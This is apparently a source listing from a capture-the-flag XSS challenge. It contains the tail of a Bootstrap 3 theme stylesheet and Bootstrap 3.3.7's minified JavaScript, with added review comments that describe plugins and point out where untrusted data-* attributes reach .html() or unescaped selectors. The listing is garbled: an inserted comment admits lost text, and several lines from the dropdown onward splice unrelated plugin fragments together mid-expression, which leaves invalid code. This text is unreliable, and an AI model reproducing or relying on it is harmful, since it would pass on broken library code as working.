100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f0ad4e),to(#ec971f));background-image:linear-gradient(to bottom,#f0ad4e 0,#ec971f 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff0ad4e', 
endColorstr='#ffec971f', GradientType=0);background-repeat:repeat-x}.progress-bar-danger{background-image:-webkit-linear-gradient(top,#d9534f 0,#c9302c 100%);background-image:-o-linear-gradient(top,#d9534f 0,#c9302c 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9534f),to(#c9302c));background-image:linear-gradient(to bottom,#d9534f 0,#c9302c 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9534f', endColorstr='#ffc9302c', GradientType=0);background-repeat:repeat-x}.progress-bar-striped{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.list-group{border-radius:4px;-webkit-box-shadow:0 1px 2px rgba(0,0,0,.075);box-shadow:0 1px 2px rgba(0,0,0,.075)}.list-group-item.active,.list-group-item.active:hover,.list-group-item.active:focus{text-shadow:0 -1px 0 #3071a9;background-image:-webkit-linear-gradient(top,#428bca 0,#3278b3 100%);background-image:-o-linear-gradient(top,#428bca 0,#3278b3 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#3278b3));background-image:linear-gradient(to bottom,#428bca 0,#3278b3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff3278b3', GradientType=0);background-repeat:repeat-x;border-color:#3278b3}.panel{-webkit-box-shadow:0 1px 2px rgba(0,0,0,.05);box-shadow:0 1px 2px rgba(0,0,0,.05)}.panel-default>.panel-heading{background-image:-webkit-linear-gradient(top,#f5f5f5 0,#e8e8e8 
100%);background-image:-o-linear-gradient(top,#f5f5f5 0,#e8e8e8 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#e8e8e8));background-image:linear-gradient(to bottom,#f5f5f5 0,#e8e8e8 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#ffe8e8e8', GradientType=0);background-repeat:repeat-x}.panel-primary>.panel-heading{background-image:-webkit-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-o-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#357ebd));background-image:linear-gradient(to bottom,#428bca 0,#357ebd 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff357ebd', GradientType=0);background-repeat:repeat-x}.panel-success>.panel-heading{background-image:-webkit-linear-gradient(top,#dff0d8 0,#d0e9c6 100%);background-image:-o-linear-gradient(top,#dff0d8 0,#d0e9c6 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#dff0d8),to(#d0e9c6));background-image:linear-gradient(to bottom,#dff0d8 0,#d0e9c6 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffdff0d8', endColorstr='#ffd0e9c6', GradientType=0);background-repeat:repeat-x}.panel-info>.panel-heading{background-image:-webkit-linear-gradient(top,#d9edf7 0,#c4e3f3 100%);background-image:-o-linear-gradient(top,#d9edf7 0,#c4e3f3 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9edf7),to(#c4e3f3));background-image:linear-gradient(to bottom,#d9edf7 0,#c4e3f3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9edf7', endColorstr='#ffc4e3f3', GradientType=0);background-repeat:repeat-x}.panel-warning>.panel-heading{background-image:-webkit-linear-gradient(top,#fcf8e3 0,#faf2cc 100%);background-image:-o-linear-gradient(top,#fcf8e3 0,#faf2cc 100%);background-image:-webkit-gradient(linear,left top,left 
bottom,from(#fcf8e3),to(#faf2cc));background-image:linear-gradient(to bottom,#fcf8e3 0,#faf2cc 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffcf8e3', endColorstr='#fffaf2cc', GradientType=0);background-repeat:repeat-x}.panel-danger>.panel-heading{background-image:-webkit-linear-gradient(top,#f2dede 0,#ebcccc 100%);background-image:-o-linear-gradient(top,#f2dede 0,#ebcccc 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f2dede),to(#ebcccc));background-image:linear-gradient(to bottom,#f2dede 0,#ebcccc 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2dede', endColorstr='#ffebcccc', GradientType=0);background-repeat:repeat-x}.well{background-image:-webkit-linear-gradient(top,#e8e8e8 0,#f5f5f5 100%);background-image:-o-linear-gradient(top,#e8e8e8 0,#f5f5f5 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#e8e8e8),to(#f5f5f5));background-image:linear-gradient(to bottom,#e8e8e8 0,#f5f5f5 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe8e8e8', endColorstr='#fff5f5f5', GradientType=0);background-repeat:repeat-x;border-color:#dcdcdc;-webkit-box-shadow:inset 0 1px 3px rgba(0,0,0,.05),0 1px 0 rgba(255,255,255,.1);box-shadow:inset 0 1px 3px rgba(0,0,0,.05),0 1px 0 rgba(255,255,255,.1)} -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/static/bootstrap.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.3.7 (http://getbootstrap.com) 3 | * Copyright 2011-2016 Twitter, Inc. 
4 | * Licensed under the MIT license 5 | */ 6 | if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){if(a(b.target).is(this))return b.handleObj.handler.apply(this,arguments)}})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.7",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigger("closed.bs.alert").remove()}var e=a(this),f=e.attr("data-target");f||(f=e.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,""));var g=a("#"===f?[]:f);b&&b.preventDefault(),g.length||(g=e.closest(".alert")),g.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return 
a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),/* Button plugin (data key "bs.button"). setState(name) looks up name + "Text" in the element's data-* values, falling back to the options, and writes it with .val() on inputs or .html() on other elements; "loadingText" also disables the element. toggle() flips the "active" class and keeps a nested radio/checkbox in step. NOTE(review): because non-input elements are written with .html(), data-*-text values are parsed as markup; keep them out of untrusted hands. */+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof b&&b;e||d.data("bs.button",e=new c(this,f)),"toggle"==b?e.toggle():b&&e.setState(b)})}var c=function(b,d){this.$element=a(b),this.options=a.extend({},c.DEFAULTS,d),this.isLoading=!1};c.VERSION="3.3.7",c.DEFAULTS={loadingText:"loading..."},c.prototype.setState=function(b){var c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",null==f.resetText&&d.data("resetText",d[e]()),setTimeout(a.proxy(function(){d[e](null==f[b]?this.options[b]:f[b]),"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c).prop(c,!0)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c).prop(c,!1))},this),0)},c.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")?(c.prop("checked")&&(a=!1),b.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(c){var d=a(c.target).closest(".btn");b.call(d,"toggle"),a(c.target).is('input[type="radio"], input[type="checkbox"]')||(c.preventDefault(),d.is("input,button")?d.trigger("focus"):d.find("input:visible,button:visible").first().trigger("focus"))}).on("focus.bs.button.data-api
blur.bs.button.data-api",'[data-toggle^="button"]',function(b){a(b.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(b.type))})}(jQuery),/* Carousel plugin (data key "bs.carousel"). Options merge DEFAULTS, the element's data-* values and the call argument. cycle() and pause() manage the interval timer; to(n), next() and prev() go through slide(), which fires slide.bs.carousel first (cancellable) and slid.bs.carousel once the change is done. */+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},c.DEFAULTS,d.data(),"object"==typeof b&&b),g="string"==typeof b?b:f.slide;e||d.data("bs.carousel",e=new c(this,f)),"number"==typeof b?e.to(b):g?e[g]():f.interval&&e.pause().cycle()})}var c=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.7",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37:this.prev();break;case 39:this.next();break;default:return}a.preventDefault()}},c.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(a){return this.$items=a.parent().children(".item"),this.$items.index(a||this.$active)},c.prototype.getItemForDirection=function(a,b){var c=this.getItemIndex(b),d="prev"==a&&0===c||"next"==a&&c==this.$items.length-1;if(d&&!this.options.wrap)return b;var e="prev"==a?-1:1,f=(c+e)%this.$items.length;return this.$items.eq(f)},c.prototype.to=function(a){var b=this,c=this.getItemIndex(this.$active=this.$element.find(".item.active"));if(!(a>this.$items.length-1||a<0))return
this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){if(!this.sliding)return this.slide("next")},c.prototype.prev=function(){if(!this.sliding)return this.slide("prev")},c.prototype.slide=function(b,d){var e=this.$element.find(".item.active"),f=d||this.getItemForDirection(b,e),g=this.interval,h="next"==b?"left":"right",i=this;if(f.hasClass("active"))return this.sliding=!1;var j=f[0],k=a.Event("slide.bs.carousel",{relatedTarget:j,direction:h});if(this.$element.trigger(k),!k.isDefaultPrevented()){if(this.sliding=!0,g&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var l=a(this.$indicators.children()[this.getItemIndex(f)]);l&&l.addClass("active")}var m=a.Event("slid.bs.carousel",{relatedTarget:j,direction:h});return a.support.transition&&this.$element.hasClass("slide")?(f.addClass(b),f[0].offsetWidth,e.addClass(h),f.addClass(h),e.one("bsTransitionEnd",function(){f.removeClass([b,h].join(" ")).addClass("active"),e.removeClass(["active",h].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};/* Data-API click handler: finds the carousel through data-target, or the fragment of href, as a jQuery selector and acts only if the match has class "carousel". */var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var
g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interval=!1),b.call(f,g),h&&f.data("bs.carousel").to(h),c.preventDefault()}};a(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var c=a(this);b.call(c,c.data())})})}(jQuery),/* Collapse plugin (data key "bs.collapse"). show() and hide() animate the element's width or height (see dimension()) and fire show/shown and hide/hidden events; options merge DEFAULTS, the element's data-* values and the call argument. NOTE(review): getParent() passes options.parent to jQuery and also concatenates it unescaped into an attribute selector, and b() resolves data-target/href the same way, so these attributes must not carry untrusted content. */+function(a){"use strict";function b(b){var c,d=b.attr("data-target")||(c=b.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"");return a(d)}function c(b){return this.each(function(){var c=a(this),e=c.data("bs.collapse"),f=a.extend({},d.DEFAULTS,c.data(),"object"==typeof b&&b);!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||c.data("bs.collapse",e=new d(this,f)),"string"==typeof b&&e[b]()})}var d=function(b,c){this.$element=a(b),this.options=a.extend({},d.DEFAULTS,c),this.$trigger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VERSION="3.3.7",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(!(e&&e.length&&(b=e.data("bs.collapse"),b&&b.transitioning))){var f=a.Event("show.bs.collapse");if(this.$element.trigger(f),!f.isDefaultPrevented()){e&&e.length&&(c.call(e,"hide"),b||e.data("bs.collapse",null));var g=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[g](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse
in")[g](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return h.call(this);var i=a.camelCase(["scroll",g].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(d.TRANSITION_DURATION)[g](this.$element[0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition?void this.$element[c](0).one("bsTransitionEnd",a.proxy(e,this)).emulateTransitionEnd(d.TRANSITION_DURATION):e.call(this)}}},d.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},d.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(c,d){var e=a(d);this.addAriaAndCollapsedClass(b(e),e)},this)).end()},d.prototype.addAriaAndCollapsedClass=function(a,b){var c=a.hasClass("in");a.attr("aria-expanded",c),b.toggleClass("collapsed",!c).attr("aria-expanded",c)};var e=a.fn.collapse;a.fn.collapse=c,a.fn.collapse.Constructor=d,a.fn.collapse.noConflict=function(){return a.fn.collapse=e,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),/* Dropdown plugin (data key "bs.dropdown"). b() resolves the menu container from data-target, or from an href that contains "#" followed by a letter, as a jQuery selector and falls back to the element's parent when nothing matches. */+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function
c(c){/* c(): unless the event has which === 3, removes the backdrop and closes each open menu, firing hide.bs.dropdown (cancellable) and then hidden.bs.dropdown; a click inside an input or textarea within the open menu leaves it open. */c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(e[0],c.target)||(e.trigger(c=a.Event("hide.bs.dropdown",f)),c.isDefaultPrevented()||(d.attr("aria-expanded","false"),e.removeClass("open").trigger(a.Event("hidden.bs.dropdown",f)))))}))}function d(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new g(this)),"string"==typeof b&&d[b].call(c)})}var e=".dropdown-backdrop",f='[data-toggle="dropdown"]',g=function(b){a(b).on("click.bs.dropdown",this.toggle)};g.VERSION="3.3.7",/* toggle(): ignores disabled elements, closes any open menus, then opens this one unless it was already open; on touch-capable documents outside .navbar-nav it first inserts a backdrop element whose click closes the menu. */g.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=b(e),g=f.hasClass("open");if(c(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger(a.Event("shown.bs.dropdown",h))}return!1}},/* keydown(): acts on key codes 38, 40, 27 and 32 (matched with an unanchored regex on c.which) when the target is not an input or textarea. */g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)){var d=a(this);if(c.preventDefault(),c.stopPropagation(),!d.is(".disabled, :disabled")){var e=b(d),g=e.hasClass("open");if(!g&&27!=c.which||g&&27==c.which)return 27==c.which&&e.find(f).trigger("focus"),d.trigger("click");var h=" li:not(.disabled):visible a",i=e.find(".dropdown-menu"+h);if(i.length){var j=i.index(c.target);38==c.which&&j>0&&j--,/* NOTE(review): the listing is damaged from this point: text was lost during extraction, so the rest of this line joins the dropdown keydown handler to fragments of a different plugin (presumably modal, judging by bodyIsOverflowing and scrollbarWidth) and is not valid code. */40==c.which&&jdocument.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},c.prototype.checkScrollbar=function(){var
a=window.innerWidth;if(!a){var b=document.documentElement.getBoundingClientRect();a=b.right-Math.abs(b.left)}this.bodyIsOverflowing=document.body.clientWidth
',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0}},c.prototype.init=function(b,c,d){if(this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},c.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},c.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof 
a.Event&&(c.inState["focusin"==b.type?"focus":"hover"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())},c.prototype.isInStateTrue=function(){for(var a in this.inState)if(this.inState[a])return!0;return!1},c.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);if(c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusout"==b.type?"focus":"hover"]=!1),!c.isInStateTrue())return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide()},c.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(b);var d=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(b.isDefaultPrevented()||!d)return;var e=this,f=this.tip(),g=this.getUID(this.type);this.setContent(),f.attr("id",g),this.$element.attr("aria-describedby",g),this.options.animation&&f.addClass("fade");var h="function"==typeof this.options.placement?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var k=this.getPosition(),l=f[0].offsetWidth,m=f[0].offsetHeight;if(j){var n=h,o=this.getPosition(this.$viewport);h="bottom"==h&&k.bottom+m>o.bottom?"top":"top"==h&&k.top-mo.width?"left":"left"==h&&k.left-lg.top+g.height&&(e.top=g.top+g.height-i)}else{var 
j=b.left-f,k=b.left+f+c;jg.right&&(e.left=g.left+g.width-k)}return e},c.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},c.prototype.getUID=function(a){do a+=~~(1e6*Math.random());while(document.getElementById(a));return a},c.prototype.tip=function(){if(!this.$tip&&(this.$tip=a(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},c.prototype.enable=function(){this.enabled=!0},c.prototype.disable=function(){this.enabled=!1},c.prototype.toggleEnabled=function(){this.enabled=!this.enabled},c.prototype.toggle=function(b){var c=this;b&&(c=a(b.currentTarget).data("bs."+this.type),c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c))),b?(c.inState.click=!c.inState.click,c.isInStateTrue()?c.enter(c):c.leave(c)):c.tip().hasClass("in")?c.leave(c):c.enter(c)},c.prototype.destroy=function(){var a=this;clearTimeout(this.timeout),this.hide(function(){a.$element.off("."+a.type).removeData("bs."+a.type),a.$tip&&a.$tip.detach(),a.$tip=null,a.$arrow=null,a.$viewport=null,a.$element=null})};var d=a.fn.tooltip;a.fn.tooltip=b,a.fn.tooltip.Constructor=c,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=d,this}}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof b&&b;!e&&/destroy|hide/.test(b)||(e||d.data("bs.popover",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires 
tooltip.js");c.VERSION="3.3.7",c.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:''}),c.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),c.prototype.constructor=c,c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content").children().detach().end()[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},c.prototype.hasContent=function(){return this.getTitle()||this.getContent()},c.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var d=a.fn.popover;a.fn.popover=b,a.fn.popover.Constructor=c,a.fn.popover.noConflict=function(){return a.fn.popover=d,this}}(jQuery),+function(a){"use strict";function b(c,d){this.$body=a(document.body),this.$scrollElement=a(a(c).is(document.body)?window:c),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this)),this.refresh(),this.process()}function c(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})}b.VERSION="3.3.7",b.DEFAULTS={offset:10},b.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},b.prototype.refresh=function(){var 
b=this,c="offset",d=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),a.isWindow(this.$scrollElement[0])||(c="position",d=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var b=a(this),e=b.data("target")||b.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[c]().top+d,e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.getScrollHeight(),d=this.options.offset+c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(this.scrollHeight!=c&&this.refresh(),b>=d)return g!=(a=f[f.length-1])&&this.activate(a);if(g&&b=e[a]&&(void 0===e[a+1]||b .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),e&&e()}var g=d.find("> .active"),h=e&&a.support.transition&&(g.length&&g.hasClass("fade")||!!d.find("> .fade").length);g.length&&h?g.one("bsTransitionEnd",f).emulateTransitionEnd(c.TRANSITION_DURATION):f(),g.removeClass("in")};var d=a.fn.tab;a.fn.tab=b,a.fn.tab.Constructor=c,a.fn.tab.noConflict=function(){return a.fn.tab=d,this};var 